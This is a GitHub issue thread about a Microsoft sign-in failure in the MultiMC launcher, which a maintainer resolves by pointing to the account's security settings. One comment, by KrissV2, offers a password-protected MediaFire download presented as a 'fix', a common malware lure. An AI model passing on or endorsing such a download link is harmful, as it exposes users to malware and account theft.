### ISSUE TITLE
Microsoft User Authentication Failed

### ISSUE THREAD

**Issue by gklewis83** [MultiMC/Launcher#5501]
### Operating System

Windows

### Description of bug

I have two kids accounts that have previously worked. Now, one of them does not - yielding a red message that the user authentication failed.

Setup:
- I am running Windows 11 Home edition.
- Windows is up-to-date.
- MultiMC is up-to-date.
- I have multiple working accounts in my MultiMC setup.

Troubleshooting:
- I have successfully authenticated with https://www.microsoft.com/link - returning that the account is now signed in to MultiMC. However, MultiMC itself replies with that red message.
- I have successfully authenticated and even logged into a world using the regular launcher.
- I have three other profiles in MultiMC that _do_ work.
- I have used a completely new install of MultiMC and it does the same thing, too.
- I have also consulted your Discord for any assistance ahead of deciding to put in this ticket.
  - Message Link: <https://discord.com/channels/132965178051526656/134843027553255425/1279246143909400688>

### Steps to reproduce

This is the problem. The issue only happens with my daughter's account - not my son's. And, the fact that my daughter's account _does_ work from the Mojang's launcher doesn't help pin anything down.

### Suspected cause

No ideas at this point. I've exhausted all of the ideas that I have come to.

### This issue is unique

- [X] I have searched the issue tracker and did not find an issue describing my bug.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by phit** [comment]
please post the MultiMC-0.log file from the launcher folder of it not working, that should give use the Microsoft error code, and make sure to not use email code to login, you need to use password or push auth

**Comment by gklewis83** [comment]
There appears to be no such option for password or push auth. <please see image>

![image](https://github.com/user-attachments/assets/61117e7f-d144-477a-8f36-1143f290e652)

**Comment by phit** [comment]
you need to change it in the security settings to enable it https://account.live.com/proofs/manage/additional

**Comment by gklewis83** [comment]
> you need to change it in the security settings to enable it https://account.live.com/proofs/manage/additional

This pointed me in the right direction. I was able to pull in my daughter's account. Thank you!
